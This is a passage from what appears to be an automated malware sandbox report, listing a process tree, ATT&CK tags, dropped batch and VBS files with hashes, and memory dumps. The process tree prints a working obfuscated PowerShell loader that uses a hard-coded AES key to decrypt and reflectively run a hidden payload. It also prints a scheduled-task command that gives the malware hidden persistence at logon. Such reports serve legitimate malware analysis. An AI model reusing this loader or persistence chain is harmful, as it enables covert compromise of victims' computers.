}}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  2⤵
  PID:3840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_861_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        5⤵
        
        PID:4964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:2556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4c10a330054b4aa9a37f63a4053f87d8

SHA1
49617e69ea31bb85d2ee6f9fc142a11c6e416f4a

SHA256
39b674c0a2727ac505dc12e1e9236b3646fe246efef25b1ae1036fd674246286

SHA512
f9f4e16c1eb2d2ca2e6330f0e11770e491f829958e1ebdd4a6f8ddc748c7b07b167680a9c07499b9eda088bf69d99a48e20fac98f36bc5b4cda8195747e3df1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
50KB

MD5
2143b379fed61ab5450bab1a751798ce

SHA1
32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

SHA256
a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

SHA512
0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
690b700dfc96df64fefaa604eb5e9164

SHA1
2e4cce0a2781d5903e2bac1c912425a9dad2195d

SHA256
9f32111b998a6bd796d09ec4495566e19f0db135bdd399abe4ec5f2508141d68

SHA512
30ff89aa115f030d856b337c2507c9398ff17560fb3a6fe001cccc253f5a0514165b41b9bfaa0d37e3f8eaf05264c8ec9c54fbde18a7e683fd963059b17757b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
c548ed01ae645adff1598bd0dcfb16c7

SHA1
14c0583817bd5f62190f2e167dff7b1be066c173

SHA256
f126e6f7c0898e5dfcda73ecdd6bd3205c6e9d416d9971e92a403d5bae47c4bb

SHA512
1ba317543c77ba9c385370b6fbdefb3339a9b53db8b9b0ad5415ecd9261c9fbeb7d7efd2c4d1ddb7b50fde73e23c36284755bd604a0c9d339be2112ed3353a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
56fd2bc3a8a94e679815a7ef8d9a6ee3

SHA1
60d4f84e04d5ed2050fa1ac06cdbc41471547d24

SHA256
97fe24084be215a5171782c2addf9a00dcd15b97d269a330b8ac73375f726ef1

SHA512
8a5b06ce81e0eaf385d3ec94561ae431e1f262b8733f7adc2141d74c59d63d02e74d45c35e7ffb1be1c4c999f5983465cc067ee1fedb964844302e5522c76041

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
c6fd07eb54759e15ea7f5f4dd9a82adf

SHA1
9aa483eea0adec5588c6e0b0f632d6b4f909bdeb

SHA256
acb8c6d1373d893039d6fd4efe8d536708163ae3749b899be0e2f74c5876e216

SHA512
179839e1758814ce0761abe81809552d7647cf58ea16e99b4952b16d44080a6389ba7722ebf18617b1c2c5d38b21b0b62e25ca81f9984aa21d28e00a9422120f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
02ff25a2b8922d643cfe94f681a12e7e

SHA1
7c7e4dbe073e6c67330d4c08586c987a687b4188

SHA256
8bf6ebc47146467a46543124876c4b4cd2791c72b785d18ffe67c8b2d230e050

SHA512
8caa6b3cc65aaf591e41f1dc746334a0a6ca904c32a98b7483870912172dbf131e49077cc6238cd436020125be85ca052cc2f69c3298f8972e37e8df51fee2fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6bd32908cca3ad2cf9607410f5ec2b99

SHA1
e4776891be1e9b7bc1483b6c7ba11e42c6ab1efa

SHA256
29d939da16fb198a4c7c5c11cb06033ad10c92c514de497585638b18fb7c1962

SHA512
db0f2f0deef4c3bd248669001f22132c7ee896ad23132fbe3e68a674a7c100583551174a250eae0004cabdce9023561a0342eeca184a8807340c1ff131b918e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_miyo3y53.szo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\conhost.bat

Filesize
274KB

MD5
e19333732c953dccd21bd997320a7a53

SHA1
93462b009375d7bb5434843b871dc439c9b8555d

SHA256
0556c1dcf0f0928084b9067e210e8b72c79dd02831b70a4f4e81c4e3298ff3d9

SHA512
cde6e8475e5433d51a9f2fb2db3cbf46e86089392344da43e194c3da90005597a56140cd580a2c6edfbcde9a95618c1233160d1ff79d049efcbdad62ee06bdf3

Download Submit
C:\Users\Admin\AppData\Local\dllhost.bat

Filesize
83KB

MD5
fc1bd57fa57b7b5c512746c7de3fa19a

SHA1
7f794e6459def2dcc346d562aacca372e7282270

SHA256
8977812b16f1e3d827cbce1675d9ad9e2f0370cf27cb3b23b389594739c3b837

SHA512
71a1908e1625c9ef28c5a85ca21dfdadcebfc4ae41b21ba2d11a92e1192a49a819adde6fb30fb9f2e8f4199a264c56e86f9d21a67704f7b25b8dbdd9c43b07d9

Download Submit
C:\Users\Admin\AppData\Local\svchost.bat

Filesize
304KB

MD5
74f5686e51d07dab9f43f62081f83003

SHA1
8d6b22e17db345f43ec3db13748c162d3cd1b229

SHA256
52974d82b405f9ebba25b6de26cbf2c59f4ec9e4d6c7059661f9f2f02e29d03e

SHA512
5865a681a5e9b3464351a4d9e5bf18dccf3ed43f288c388decfa8559e496c67a563acadd8b7563e4004fe320298b47842a5a672552f14a95772460f54f782384

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs

Filesize
124B

MD5
a18bd6dc1b350c27c0b6b3b97280e05a

SHA1
5942904aba32ab36623722eb18017644755e1f02

SHA256
ef73bc9d025e3d7672a6dee2164fc33f9a2337d8e1b992527c7cffef31604517

SHA512
b84af565893f6bed5389df962a7fd262fa02c4bca09c89bd8708c8ce46aa1bb542d76daa5745ce435b79fc409da1cafd9ae1ff4e9f0ed35a2773bbae7ca58294

Download Submit
C:\Users\Admin\AppData\Roaming\$svchost_724.vbs

Filesize
112B

MD5
915c576845b00de7b55928536eb8a5c5

SHA1
d87a9df7bd6a3724f42726c8c09301680e319192

SHA256
b6e404b9cd7d0692adee73269af4645190b4b40a7f4d38ba8184cf9eee9b314d

SHA512
dd0c34e70f8565ee210349c27f787ebf5a9db09472a24020af4096c4f6955cdca9d42a353993158a291255aa0102f97ab85a766bd03e86bb23674573fc0f8334

Download Submit
memory/732-368-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/816-374-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1216-371-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1352-329-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1360-326-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1368-325-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1408-372-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1560-370-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1752-327-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/1904-373-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2512-333-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2520-332-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2556-323-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2688-456-0x0000021F4DF40000-0x0000021F4DF48000-memory.dmp

Filesize
32KB

Download
memory/2688-457-0x0000021F4E430000-0x0000021F4E46C000-memory.dmp

Filesize
240KB

Download
memory/2704-328-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2732-331-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/2748-324-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/3384-322-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/3384-310-0x0000000000F70000-0x0000000000F9A000-memory.dmp

Filesize
168KB

Download
memory/3560-399-0x000002586A1C0000-0x000002586A1CE000-memory.dmp

Filesize
56KB

Download
memory/4712-330-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/4868-369-0x00007FFA3CF20000-0x00007FFA3CF30000-memory.dmp

Filesize
64KB

Download
memory/4920-77-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/4920-56-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/4920-7-0x00000110D86B0000-0x00000110D86D2000-memory.dmp

Filesize
136KB

Download
memory/4920-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/4920-23-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/4920-36-0x00000110D8870000-0x00000110D88AC000-memory.dmp

Filesize
240KB

Download
memory/4920-47-0x00000110D8CB0000-0x00000110D8D26000-memory.dmp

Filesize
472KB

Download
memory/4920-78-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/4920-57-0x00000110D88B0000-0x00000110D88B8000-memory.dmp

Filesize
32KB

Download
memory/4920-59-0x00000110D8E00000-0x00000110D8ED0000-memory.dmp

Filesize
832KB

Download
memory/4920-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

Filesize
4KB

Download
memory/4920-58-0x00000110D8D30000-0x00000110D8E02000-memory.dmp

Filesize
840KB

Download
memory/5048-206-0x0000024DC9EA0000-0x0000024DC9ED6000-memory.dmp

Filesize
216KB

Download
memory/5048-205-0x0000024DC9A10000-0x0000024DC9A18000-memory.dmp

Filesize
32KB

Download
memory/5060-84-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/5060-85-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/5060-485-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

Filesize
9.9MB

Download
memory/5068-153-0x0000025F80000000-0x0000025F81000000-memory.dmp

Filesize
16.0MB

Download
memory/5068-151-0x0000025FFF430000-0x0000025FFF438000-memory.dmp

Filesize
32KB

Download
memory/5068-152-0x0000025FFF4D0000-0x0000025FFF4E2000-memory.dmp

Filesize
72KB

Download